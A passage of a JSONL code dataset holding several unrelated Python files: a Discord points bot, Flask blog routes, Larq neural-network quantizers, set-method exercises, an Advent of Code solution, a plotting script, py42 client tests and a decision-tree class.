cls.box_list[user]\n # 이미 받음\n if remains_time < random_box_time:\n title = \"랜덤 박스를 열 수 없습니다.\"\n text = f'이미 받았잖아!!!\\n' \\\n f'남은 시간: {random_box_time - remains_time}'\n em = discord.Embed(title=title, description=text)\n return em\n else:\n # 처음은 아니지만 갱신\n cls.box_list[user] = datetime.now()\n # 랜덤 박스 열기\n em = cls.open_random_box(user, betting)\n return em\n\n @classmethod\n def open_random_box(cls, user, betting) -> Embed:\n # 포인트 계산\n rand_point = random.randrange(random_min_point, random_max_point)\n get_point = rand_point + rand_point * (betting/random_max_point)\n # 포인트 입력\n reason = f\"일일 랜덤 박스로 포인트 {get_point} 획득\"\n PointDB.earn_point_user(user, get_point, reason)\n\n # 메세지 작성\n now_pt = PointDB.get_point(user)\n title = \"랜덤 박스를 열었습니다\"\n text = f'{user}가 {get_point}pt 획득\\n' \\\n f'총 {now_pt}pt 보유중'\n em = discord.Embed(title=title, description=text)\n return em\n\n @classmethod\n def ranking(cls):\n title = \"포인트 랭킹\"\n ranking_list = PointDB.get_ranking_List()\n text = f\"이미 있었지만 아무도 안보는 것 같아서 따로 만드는 랭킹\"\n em = Embed(title=title, description=text)\n for user in ranking_list:\n title1 = f\"{user[0]}\"\n text1 = f\"{user[1]}pt\"\n em.add_field(name=title1, value=text1, inline=False)\n return em\n","sub_path":"MainService/Point/point_engine.py","file_name":"point_engine.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"577797232","text":"\n\nfrom flask import Blueprint\n# from flask import redirect\n# from flask import abort\nfrom flask import request\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import session\n\nfrom wtforms import StringField\nfrom wtforms.validators import ValidationError\n\nfrom ..models import Category\nfrom ..models import Article\nfrom ..models import Evaluation\nfrom ..models import BasicSetting\nfrom ..models import Tag\nfrom ..models import arcicle_tags\n\nfrom functools import wraps\n\nfrom ..forms import SearchForm\nfrom sqlalchemy import or_\n\nfrom myBlogApp import db,cache\n\nhome = Blueprint('home',__name__)\n\n\n# 阅读数\ndef readed_sum(f):\n @wraps(f) \n def decorated_function(*args, **kwargs):\n print(args)\n print(kwargs)\n articleID = kwargs['articleID']\n if articleID is not None:\n article = Article.query.filter_by(at_id=articleID).first()\n # 更新阅读数\n article.updateReadedSum() \n db.session.add(article)\n db.session.commit()\n\n return f(*args, **kwargs)\n return decorated_function \n\n# 缓存无参函数\n# 分类 标签 基础设置等信息缓存 \n@cache.cached(timeout=3600, key_prefix='bar_data')\ndef data_required_cache():\n\n # print('test +++ data_required_cache')\n categorys = Category.query.all()\n setting = BasicSetting.query.first()\n tags = Tag.query.all()\n\n return categorys,setting,tags\n\n\n@cache.memoize(3600)\ndef article_list_for_categoryType(categoryType):\n\n category = Category.query.filter_by(name=categoryType).first()\n if category is not None:\n all_articles = Article.query.filter_by(category_id=category.id,at_restatus='1').order_by(-Article.at_creattime).all()\n else:\n all_articles = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).all()\n \n return all_articles\n\ndef make_cache_key(*args, **kwargs):\n \"\"\"Dynamic creation the request url.\"\"\"\n\n path = request.path\n args = str(hash(frozenset(request.args.items())))\n return (path + args).encode('utf-8')\n\n\n\n# 首页\n@home.route('/')\n@cache.cached(timeout=10)\ndef index():\n # return redirect(url_for('home.navIndex',navitemtype='首���'))\n return navIndex(navitemtype='首页')\n\n# 所有标签标签\n@home.route('/all-tags/')\n@cache.cached(timeout=3600)\ndef allTags():\n\n categorys,setting,tags = data_required_cache()\n\n return render_template('articalDetail_all_tags.html',categorys=categorys,tags=tags,setting=setting,currentItemId=\"首页\")\n\n# # 文章列表\n# @home.route('//')\n# @home.route('///')\n# @home.route('//search/',methods=['POST'])\n# def article_list(navitemtype='首页',tagname=None):\n# query = Article.query.filter_by(at_restatus='1')\n# if tagname is not None:\n \n\n\n\n@home.route('/articles_by_tag//')\n@cache.cached(timeout=3600, key_prefix=make_cache_key)\ndef articlesByTag(tagname):\n tag = Tag.query.filter_by(tag_name=tagname).first()\n if tag is None:\n return navIndex(navitemtype='首页')\n \n page = request.args.get('page', 1, type=int)\n\n articals = tag.article\n\n categorys,setting,tags = data_required_cache()\n\n return render_template('index.html',tag=tag,pagination=None,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=\"首页\")\n\n# 分类下的文章列表\n@home.route('//')\n@cache.cached(timeout=60, key_prefix=make_cache_key) \ndef navIndex(navitemtype):\n\n page = request.args.get('page', 1, type=int)\n if navitemtype == '首页':\n pagination = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n else:\n # 关于\n # 先根据名称获取id\n category = Category.query.filter_by(name=navitemtype).first()\n if category:\n if navitemtype == '关于':\n about_article = Article.query.filter_by(category_id=category.id).first()\n # return redirect(url_for('home.detailById',navitemtype=navitemtype,articleID=about_article.at_id))\n return detailById(navitemtype=navitemtype,articleID=about_article.at_id)\n else:\n pagination = Article.query.filter_by(category_id=category.id,at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n else:\n # 没有这个分类的时候,显示所有\n pagination = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n \n articals = pagination.items\n \n categorys,setting,tags = data_required_cache()\n\n return render_template('index.html',pagination=pagination,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=navitemtype)\n\n# 文章详情 by id\n@home.route('//articalDetail//')\n@readed_sum\n# @cache.cached(timeout=10, key_prefix=make_cache_key)\ndef detailById(navitemtype,articleID):\n\n article = Article.query.filter_by(at_id=articleID).first()\n\n categorys,setting,tags = data_required_cache()\n\n all_articles = article_list_for_categoryType(navitemtype)\n pre_at = None\n after_at = None\n\n for index in range(len(all_articles)):\n if all_articles[index].at_id == article.at_id:\n if index -1 >= 0:\n pre_at = all_articles[index - 1]\n if index + 1 < len(all_articles):\n after_at = all_articles[index + 1]\n break\n \n return render_template('articalDetail.html',article=article,categorys=categorys,tags=tags,setting=setting,currentItemId=navitemtype,pre_at=pre_at,after_at=after_at)\n\n# 搜索\n@home.route('/search/',methods=['POST'])\ndef search():\n\n page = request.args.get('page', 1, type=int)\n search_from = SearchForm()\n print(search_from.searchWords.data)\n if search_from.validate_on_submit():\n query = Article.query\n query = query.join(arcicle_tags)\n query = query.join(Tag).filter(or_(Article.at_title.like(\"%\"+search_from.searchWords.data+\"%\"),Article.at_body_summary.like(\"%\"+search_from.searchWords.data+\"%\"),Article.at_body_orgin.like(\"%\"+search_from.searchWords.data+\"%\"),Tag.tag_name.like(\"%\"+search_from.searchWords.data+\"%\")))\n pagniation = query.paginate(page,per_page=8,error_out=True)\n else:\n return navIndex(navitemtype='首页')\n\n articals = pagniation.items\n\n categorys,setting,tags = data_required_cache()\n \n return render_template('index.html',search=search_from.searchWords.data,pagination=pagniation,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=\"首页\")\n\n","sub_path":".vscode/myBlogApp/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52650622","text":"\"\"\"A Quantizer defines the way of transforming a full precision input to a\nquantized output and the pseudo-gradient method used for the backwards pass.\n\nQuantizers can either be used through quantizer arguments that are supported\nfor Larq layers, such as `input_quantizer` and `kernel_quantizer`; or they\ncan be used similar to activations, i.e. either through an `Activation` layer,\nor through the `activation` argument supported by all forward layer:\n\n```python\nimport tensorflow as tf\nimport larq as lq\n...\nx = lq.layers.QuantDense(64, activation=None)(x)\nx = lq.layers.QuantDense(64, input_quantizer=\"ste_sign\")(x)\n```\n\nis equivalent to:\n\n```python\nx = lq.layers.QuantDense(64)(x)\nx = tf.keras.layers.Activation(\"ste_sign\")(x)\nx = lq.layers.QuantDense(64)(x)\n```\n\nas well as:\n\n```python\nx = lq.layers.QuantDense(64, activation=\"ste_sign\")(x)\nx = lq.layers.QuantDense(64)(x)\n```\n\nWe highly recommend using the first of these formulations: for the\nother two formulations, intermediate layers - like batch normalization or\naverage pooling - and shortcut connections may result in non-binary input\nto the convolutions.\n\"\"\"\n\nfrom dataclasses import dataclass\nimport tensorflow as tf\nfrom larq import utils, math\n\n\n@tf.custom_gradient\ndef _binarize_with_identity_grad(x):\n def grad(dy):\n return dy\n\n return math.sign(x), grad\n\n\n@tf.custom_gradient\ndef _binarize_with_weighted_grad(x):\n def grad(dy):\n return (1 - tf.abs(x)) * 2 * dy\n\n return math.sign(x), grad\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef ste_sign(x):\n r\"\"\"\n Sign binarization function.\n \\\\[\n q(x) = \\begin{cases}\n -1 & x < 0 \\\\\\\n 1 & x \\geq 0\n \\end{cases}\n \\\\]\n\n The gradient is estimated using the Straight-Through Estimator\n (essentially the binarization is replaced by a clipped identity on the\n backward pass).\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n 1 & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\\\\]\n\n ```plot-activation\n quantizers.ste_sign\n ```\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Binarized tensor.\n\n # References\n - [Binarized Neural Networks: Training Deep Neural Networks with Weights and\n Activations Constrained to +1 or -1](http://arxiv.org/abs/1602.02830)\n \"\"\"\n\n x = tf.clip_by_value(x, -1, 1)\n\n return _binarize_with_identity_grad(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef magnitude_aware_sign(x):\n r\"\"\"\n Magnitude-aware sign for Bi-Real Net.\n\n ```plot-activation\n quantizers.magnitude_aware_sign\n ```\n\n # Arguments\n x: Input tensor\n\n # Returns\n Scaled binarized tensor (with values in $\\{-a, a\\}$, where $a$ is a float).\n\n # References\n - [Bi-Real Net: Enhancing the Performance of 1-bit CNNs With Improved\n Representational Capability and Advanced Training\n Algorithm](https://arxiv.org/abs/1808.00278)\n\n \"\"\"\n scale_factor = tf.reduce_mean(tf.abs(x), axis=list(range(len(x.shape) - 1)))\n\n return tf.stop_gradient(scale_factor) * ste_sign(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef approx_sign(x):\n r\"\"\"\n Sign binarization function.\n \\\\[\n q(x) = \\begin{cases}\n -1 & x < 0 \\\\\\\n 1 & x \\geq 0\n \\end{cases}\n \\\\]\n\n The gradient is estimated using the ApproxSign method.\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n (2 - 2 \\left|x\\right|) & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\n \\\\]\n\n ```plot-activation\n quantizers.approx_sign\n ```\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Binarized tensor.\n\n # References\n - [Bi-Real Net: Enhancing the Performance of 1-bit CNNs With Improved\n Representational Capability and Advanced\n Training Algorithm](http://arxiv.org/abs/1808.00278)\n \"\"\"\n\n x = tf.clip_by_value(x, -1, 1)\n\n return _binarize_with_weighted_grad(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(2)\n@dataclass\nclass SteTern:\n r\"\"\"Instantiates a ternarization quantizer.\n\n \\\\[\n q(x) = \\begin{cases}\n +1 & x > \\Delta \\\\\\\n 0 & |x| < \\Delta \\\\\\\n -1 & x < - \\Delta\n \\end{cases}\n \\\\]\n\n where $\\Delta$ is defined as the threshold and can be passed as an argument,\n or can be calculated as per the Ternary Weight Networks original paper, such that\n\n \\\\[\n \\Delta = \\frac{0.7}{n} \\sum_{i=1}^{n} |W_i|\n \\\\]\n where we assume that $W_i$ is generated from a normal distribution.\n\n The gradient is estimated using the Straight-Through Estimator\n (essentially the Ternarization is replaced by a clipped identity on the\n backward pass).\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n 1 & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\\\\]\n\n ```plot-activation\n quantizers.SteTern\n ```\n\n # Arguments\n threshold_value: The value for the threshold, $\\Delta$.\n ternary_weight_networks: Boolean of whether to use the Ternary Weight Networks threshold calculation.\n\n # Returns\n Ternarization function\n\n # Aliases\n - `larq.quantizers.ste_tern`\n\n # References\n - [Ternary Weight Networks](http://arxiv.org/abs/1605.04711)\n \"\"\"\n\n threshold_value: float = 0.05\n ternary_weight_networks: bool = False\n\n def __call__(self, x):\n \"\"\"Calls ternarization function.\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Ternarized tensor.\n \"\"\"\n x = tf.clip_by_value(x, -1, 1)\n if self.ternary_weight_networks:\n threshold = self.threshold_twn(x)\n else:\n threshold = self.threshold_value\n\n @tf.custom_gradient\n def _ternarize_with_identity_grad(x):\n def grad(dy):\n return dy\n\n return (tf.sign(tf.sign(x + threshold) + tf.sign(x - threshold)), grad)\n\n return _ternarize_with_identity_grad(x)\n\n def threshold_twn(self, x):\n return 0.7 * tf.reduce_sum(tf.abs(x)) / tf.cast(tf.size(x), x.dtype)\n\n def get_config(self):\n return {\n \"threshold_value\": self.threshold_value,\n \"ternary_weight_networks\": self.ternary_weight_networks,\n }\n\n\nste_tern = SteTern\n\n\ndef serialize(initializer):\n return tf.keras.utils.serialize_keras_object(initializer)\n\n\ndef deserialize(name, custom_objects=None):\n return tf.keras.utils.deserialize_keras_object(\n name,\n module_objects=globals(),\n custom_objects=custom_objects,\n printable_module_name=\"quantization function\",\n )\n\n\ndef get(identifier):\n if identifier is None:\n return None\n if isinstance(identifier, str):\n return deserialize(str(identifier))\n if callable(identifier):\n return identifier\n raise ValueError(\n f\"Could not interpret quantization function identifier: {identifier}\"\n )\n","sub_path":"larq/quantizers.py","file_name":"quantizers.py","file_ext":"py","file_size_in_byte":6895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460551883","text":"# Set methods\n\n# add , inserts an item into the set\n\n\ns = {1, 2, 3, 3}\nf = s\n\ns.add(8)\n\nprint(s)\n\n# Remove , deletes an item from a set\n\ns.remove(8)\nprint(s)\n\n# copy creates a copy of the set which in not identical in memory to the first\n\ns2 = s.copy()\n\ns2 is s # returns false\n\n# Can also check the memory address of a variable\npointer_s = hex(id(s)) # same\npointer_f = hex(id(f)) # same\npointer_s2 = hex(id(s2)) # different bc of method copy\n\nprint(pointer_f, pointer_s, pointer_s2)\n\n# Clear deletes all the items in the set\n\n# s2.clear()\n","sub_path":"cs_python_lec/data_structures/sets/set_02.py","file_name":"set_02.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308251856","text":"# Day 3: No Matter How you Slice It\n\nfrom utils import *\n\n\ndef find_overlap():\n points = set()\n collisions = set()\n lines = list(map(ints, get_input_lines()))\n\n for p in lines:\n for x in range(p[1], p[1] + p[3]):\n for y in range(p[2], p[2] + p[4]):\n if (x, y) not in points:\n points.add((x, y))\n else:\n collisions.add((x, y))\n\n print('There are %d collisions' % len(collisions))\n\n for p in lines:\n collides = False\n for x in range(p[1], p[1] + p[3]):\n for y in range(p[2], p[2] + p[4]):\n if (x, y) in collisions:\n collides = True\n\n if not collides:\n print('Claim %d does not collide!' % p[0])\n\n\nif __name__ == '__main__':\n find_overlap()\n","sub_path":"day03/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"187795090","text":"import matplotlib.pyplot as plt\nimport ast\nfrom scipy.ndimage.filters import gaussian_filter1d\nimport numpy as np\n\ndef parse_propagation(name):\n with open(name) as fp:\n data = [ast.literal_eval(line) for line in fp if line.strip()]\n iterations = range(len(data[0]))\n print(\"Number of iterations {}\".format(len(iterations)))\n return [iterations, data[0], data[1], data[2]]\n\ndef parse_differential(name, i_ms):\n with open(name) as fp:\n data = [ast.literal_eval(line) for line in fp if line.strip()]\n d = data[0]\n d = d[:len(i_ms)]\n d = [x / 1000 for x in d]\n return d\n\niterations, capturing_time, updates, propagation_time = parse_propagation(\"bottleneck_issue_stats.txt\")\ndifferential_time = parse_differential(\"diff_bot.txt\", iterations)\n\npropagation_time = [u / 1000 for u in propagation_time]\n\nprint()\n\ndef avg(l):\n return sum(l) / len(l)\n\nplt.rcParams.update({'font.size': 15})\n\nfig, ax1 = plt.subplots()\n\ns = 1\nfirst_graph = np.array(propagation_time)\n#first_graph = gaussian_filter1d(first_graph, sigma=s)\nsecond_graph = np.array(differential_time)\n#second_graph = gaussian_filter1d(second_graph, sigma=s)\n\ncolor = 'tab:blue'\nax1.set_xlabel('number of batch captures,\\nbenchmarking run for 30 s')\nax1.set_ylabel('batch propagation time (microseconds) $10^3$')\nax1.plot(range(len(first_graph)), first_graph, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\n#ax1.set_ylim([0, 300])\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\ncolor = 'tab:orange'\nax2.set_ylabel('algorithm recomp. time (ms)') # we already handled the x-label with ax1\nax2.plot(range(len(second_graph)), second_graph, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nfig.tight_layout() # otherwise the right y-label is slightly clipped\n\nplt.subplots_adjust(top=0.80)\nplt.subplots_adjust(bottom=0.20)\nplt.subplots_adjust(left=0.10)\nplt.subplots_adjust(right=0.90)\n\n#axes = plt.gca()\n#plt.ylim([0, 300])\n\nplt.title(\"Computing Connected Components,\\nat a rate of 7000 transasctions per second,\\nusing 1 differential worker\")\n\nfig = plt.gcf()\nfig.set_size_inches(9, 5)\nplt.savefig(\"propagation_differential_bottleneck_issue_smoothed_better\")\nplt.show()\n\n\n\n","sub_path":"vizualizing/bottleneck_workers_example_new/vizualize.py","file_name":"vizualize.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"65880649","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom requests import Response\n\nimport py42\nfrom py42.clients.devices import DeviceClient\nfrom py42.response import Py42Response\n\nCOMPUTER_URI = \"/api/Computer\"\n\nDEFAULT_GET_DEVICES_PARAMS = {\n \"active\": None,\n \"blocked\": None,\n \"orgUid\": None,\n \"userUid\": None,\n \"targetComputerGuid\": None,\n \"incBackupUsage\": None,\n \"incCounts\": True,\n \"pgNum\": 1,\n \"pgSize\": 500,\n \"q\": None,\n}\n\nMOCK_GET_DEVICE_RESPONSE = \"\"\"{\"totalCount\": 3000, \"computers\":[\"foo\"]}\"\"\"\n\nMOCK_EMPTY_GET_DEVICE_RESPONSE = \"\"\"{\"totalCount\": 3000, \"computers\":[]}\"\"\"\n\n\nclass TestDeviceClient(object):\n @pytest.fixture\n def mock_get_all_response(self, mocker):\n response = mocker.MagicMock(spec=Response)\n response.status_code = 200\n response.encoding = \"utf-8\"\n response.text = MOCK_GET_DEVICE_RESPONSE\n return Py42Response(response)\n\n @pytest.fixture\n def mock_get_all_empty_response(self, mocker, py42_response):\n response = mocker.MagicMock(spec=Response)\n response.status_code = 200\n response.encoding = \"utf-8\"\n response.text = MOCK_EMPTY_GET_DEVICE_RESPONSE\n return Py42Response(response)\n\n def test_get_all_calls_get_with_uri_and_params(\n self, mock_session, mock_get_all_response\n ):\n client = DeviceClient(mock_session)\n mock_session.get.return_value = mock_get_all_response\n for _ in client.get_all(q=\"TEST-HOSTNAME\"):\n break\n expected_params = DEFAULT_GET_DEVICES_PARAMS\n expected_params[\"q\"] = \"TEST-HOSTNAME\"\n first_call = mock_session.get.call_args_list[0]\n assert first_call[0][0] == COMPUTER_URI\n assert first_call[1][\"params\"] == DEFAULT_GET_DEVICES_PARAMS\n\n def test_unicode_hostname_get_devices_calls_get_with_unicode_q_param(\n self, mock_session, mock_get_all_response\n ):\n unicode_hostname = u\"您已经发现了秘密信息\"\n client = DeviceClient(mock_session)\n mock_session.get.return_value = mock_get_all_response\n for _ in client.get_all(q=unicode_hostname):\n break\n first_call = mock_session.get.call_args_list[0]\n assert first_call[0][0] == COMPUTER_URI\n params = DEFAULT_GET_DEVICES_PARAMS\n params[\"q\"] = unicode_hostname\n assert first_call[1][\"params\"] == params\n\n def test_get_by_id_calls_get_with_uri_and_params(\n self, mock_session, successful_response\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_by_id(\"DEVICE_ID\", include_backup_usage=True)\n expected_params = {\"incBackupUsage\": True}\n uri = \"{}/{}\".format(COMPUTER_URI, \"DEVICE_ID\")\n mock_session.get.assert_called_once_with(uri, params=expected_params)\n\n def test_get_all_calls_get_expected_number_of_times(\n self, mock_session, mock_get_all_response, mock_get_all_empty_response\n ):\n py42.settings.items_per_page = 1\n client = DeviceClient(mock_session)\n mock_session.get.side_effect = [\n mock_get_all_response,\n mock_get_all_response,\n mock_get_all_empty_response,\n ]\n for _ in client.get_all():\n pass\n py42.settings.items_per_page = 500\n assert mock_session.get.call_count == 3\n\n def test_get_page_calls_get_with_expected_url_and_params(self, mock_session):\n client = DeviceClient(mock_session)\n client.get_page(20, True, True, \"org\", \"user\", \"dest\", True, True, 1000)\n mock_session.get.assert_called_once_with(\n \"/api/Computer\",\n params={\n \"active\": True,\n \"blocked\": True,\n \"orgUid\": \"org\",\n \"userUid\": \"user\",\n \"targetComputerGuid\": \"dest\",\n \"incBackupUsage\": True,\n \"incCounts\": True,\n \"pgNum\": 20,\n \"pgSize\": 1000,\n \"q\": None,\n },\n )\n\n def test_get_agent_state_calls_get_with_uri_and_params(\n self, mock_session, successful_response\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_agent_state(\"DEVICE_ID\", property_name=\"KEY\")\n expected_params = {\"deviceGuid\": \"DEVICE_ID\", \"propertyName\": \"KEY\"}\n uri = u\"/api/v14/agent-state/view-by-device-guid\"\n mock_session.get.assert_called_once_with(uri, params=expected_params)\n\n def test_get_agent_full_disk_access_state_calls_get_agent_state_with_arguments(\n self, mock_session, successful_response, mocker\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_agent_state = mocker.Mock()\n client.get_agent_full_disk_access_state(\"DEVICE_ID\")\n client.get_agent_state.assert_called_once_with(\"DEVICE_ID\", \"fullDiskAccess\")\n","sub_path":"tests/clients/test_devices.py","file_name":"test_devices.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183743447","text":"import pandas as pd\nimport numpy as np\nfrom graphviz import Graph\nfrom copy import deepcopy\nfrom sklearn.model_selection import KFold\n\n\nclass DecisionTree:\n def __init__(self, parent=None):\n self._parent = parent\n self._left_child = None\n self._right_child = None\n self._value = None\n self._min_leaf = None\n self._split_var = None\n self._split_value = None\n self._node_loss = None\n self._branch_loss = None\n self._is_fitted = False\n self._feature_names = None\n self._num_features = None\n self._y = None\n\n def __str__(self):\n if self._is_fitted is False:\n string_dict = {\"Loss\": self.branch_loss, \"Estimate\": self.value}\n elif self._feature_names is not None:\n string_dict = {\n \"Loss\": self.branch_loss,\n \"Splitting Variable (First split)\": self._feature_names[\n self._split_var\n ],\n \"Splitting Value\": self._split_value,\n \"Tree Depth\": self.depth,\n \"Estimate\": self.value,\n }\n else:\n string_dict = {\n \"Loss\": self.branch_loss,\n \"Splitting Feature (First split)\": self._split_var,\n \"Splitting Value\": self._split_value,\n \"Tree Depth\": self.depth,\n \"Estimate\": self.value,\n }\n return dict.__str__(string_dict)\n\n # Property and Setter Functions\n\n @property\n def y(self):\n return self._y\n\n @property\n def parent(self):\n return self._parent\n\n @property\n def left_child(self):\n return self._left_child\n\n @property\n def right_child(self):\n return self._right_child\n\n @right_child.setter\n def right_child(self, node):\n self._right_child = node\n\n @left_child.setter\n def left_child(self, node):\n self._left_child = node\n\n @property\n def feature_names(self):\n return self._feature_names\n\n @feature_names.setter\n def feature_names(self, value):\n if self.feature_names is None:\n self._feature_names = value\n\n @property\n def depth(self):\n return DecisionTree.detect_tree_depth(self)\n\n @property\n def is_leaf(self):\n if self._is_fitted:\n return self._left_child is None\n else:\n print(\n \"The tree has not been fitted yet, hence it is root and leaf at the \"\n \"same time.\\n\"\n )\n return True\n\n @property\n def is_root(self):\n return self._parent is None\n\n @property\n def is_fitted(self):\n return self._is_fitted\n\n @property\n def number_of_leafs(self):\n return DecisionTree.get_number_of_leafs(self)\n\n @property\n def value(self):\n return self._value\n\n @property\n def node_loss(self):\n return self._node_loss\n\n @property\n def branch_loss(self):\n self.update_branch_loss()\n return self._branch_loss\n\n # Various Auxiliary Functions\n\n def update_branch_loss(self):\n leaf_list = DecisionTree.get_leafs_in_list(self)\n loss_array = np.array([leaf.node_loss for leaf in leaf_list])\n self._branch_loss = np.sum(loss_array)\n\n def output_partition_estimates(self):\n leaf_list = DecisionTree.get_leafs_in_list(self)\n for i, leaf in enumerate(leaf_list):\n print(\"Leaf {:d}; Estimate: {:3.03f}\".format(i, leaf.value))\n\n def splitting_info_to_string(self):\n if self.left_child is None:\n return \"\"\n else:\n if self._feature_names is None:\n return \"Variable %d <= %3.3f\" % (self._split_var, self._split_value)\n else:\n return \"%s <= %3.3f\" % (\n self._feature_names[self._split_var],\n self._split_value,\n )\n\n # Static Methods (Some of which should probably not be static methods)\n\n @staticmethod\n def get_leafs_in_list(tree):\n leaf_list = []\n if tree.left_child is None:\n leaf_list.append(tree)\n else:\n leaf_list.extend(DecisionTree.get_leafs_in_list(tree.left_child))\n leaf_list.extend(DecisionTree.get_leafs_in_list(tree.right_child))\n return leaf_list\n\n @staticmethod\n def get_number_of_leafs(tree):\n return len(DecisionTree.get_leafs_in_list(tree))\n\n @staticmethod\n def get_level_in_list(tree, level):\n # level: 0 -> root, 1 -> first layer, 2 -> ...\n level_list = []\n if level == 0:\n level_list.append(tree)\n else:\n if tree.left_child is not None:\n level_list.extend(\n DecisionTree.get_level_in_list(tree.left_child, level - 1)\n )\n level_list.extend(\n DecisionTree.get_level_in_list(tree.right_child, level - 1)\n )\n return level_list\n\n @staticmethod\n def detect_tree_depth(tree):\n depth_left, depth_right = 0, 0\n if tree.left_child is not None:\n depth_left += 1 + DecisionTree.detect_tree_depth(tree.left_child)\n depth_right += 1 + DecisionTree.detect_tree_depth(tree.right_child)\n return max(depth_left, depth_right)\n\n @staticmethod\n def validate(tree, X_test, y_test, metric=None):\n # returns assumed validation metric on predicted and true outcomes\n if metric is None:\n\n def metric(pred, true):\n return np.mean(\n (pred - true) ** 2\n ) # if no metric is given Mean Squared Error is used (MSE)\n\n y_pred = tree.predict(X_test)\n return np.mean(metric(y_pred, y_test))\n\n @staticmethod\n def get_first_subtree(fitted_tree, thresh=None):\n subtree = deepcopy(fitted_tree)\n if thresh is None:\n thresh = np.sqrt(np.var(subtree.y)) / 50\n depth = subtree.depth\n if depth < 1:\n return subtree\n for i in range(depth):\n for parent_node in DecisionTree.get_level_in_list(subtree, depth - i - 1):\n if parent_node.left_child is not None:\n if (\n parent_node.node_loss\n <= parent_node.left_child.node_loss\n + parent_node.right_child.node_loss\n + thresh\n ):\n parent_node.left_child, parent_node.right_child = None, None\n return subtree\n\n @staticmethod\n def get_pruned_tree_and_alpha_sequence(fitted_tree, thresh):\n assert isinstance(\n fitted_tree, DecisionTree\n ), \"This method only works on Decision Trees\"\n if not fitted_tree.is_fitted:\n raise ValueError(\"This method only works on fitted trees\")\n\n alphas = [0]\n subtrees = [\n DecisionTree.get_first_subtree(fitted_tree, thresh)\n ] # get_first_subtree() does deepcopy\n\n index = 0\n while subtrees[index].left_child is not None:\n tmp_argmin, tmp_min = g(subtrees[index])\n tmp_subtree = deepcopy(subtrees[index])\n alphas.append(tmp_min)\n for node in tmp_argmin:\n node.left_child = None\n node.right_child = None\n subtrees.insert(index, tmp_subtree)\n index += 1\n\n if not test_monotonicity_list(alphas) and not test_monotonicity_list(\n alphas, strictly=False\n ):\n raise RuntimeError(\"Sequence of alphas is not increasing\")\n if not test_monotonicity_list(alphas):\n print(\"Sequence of alphas is only weakly increasing.\")\n return {\n \"alphas\": alphas,\n \"subtrees\": subtrees,\n } # i think i want: return alphas, subtrees\n\n @staticmethod\n def get_subtree_crspnd_to_abtry_alpha(tree, alpha, thresh):\n sequences = DecisionTree.get_pruned_tree_and_alpha_sequence(tree, thresh)\n alphas = sequences[\"alphas\"]\n subtrees = sequences[\"subtrees\"]\n alphas = np.array(alphas)\n if alpha >= alphas[-1]:\n return subtrees[-1]\n else:\n index = np.where(alphas > alpha)[0][0]\n return subtrees[index]\n\n @staticmethod\n def apply_kFold_CV(X_learn, y_learn, k=5, thresh=0, fitted_tree=None):\n try:\n feature_names = X_learn.columns.values\n except AttributeError:\n feature_names = None\n\n if fitted_tree is None:\n fitted_tree = DecisionTree()\n fitted_tree.fit(X_learn, y_learn)\n assert len(y_learn) == len(X_learn), (\n \"Argument <> and <> must have the same number \"\n \"of observations.\"\n )\n X_learn = coerce_to_ndarray(X_learn)\n y_learn = coerce_to_ndarray(y_learn)\n\n kf = KFold(k)\n tree_max = fitted_tree # complete maximal tree\n tree_max_sequences = DecisionTree.get_pruned_tree_and_alpha_sequence(\n tree_max, thresh\n )\n tree_k_max_list = [] # list of maximal trees in each cross validation sample\n tree_k_subtree_dict = []\n test_X = []\n test_y = []\n\n for train_index, test_index in kf.split(X_learn, y_learn):\n tmp_tree = DecisionTree()\n tmp_tree.fit(X_learn[train_index], y_learn[train_index])\n tree_k_max_list.append(tmp_tree)\n test_X.append(X_learn[test_index])\n test_y.append(y_learn[test_index])\n\n for tree in 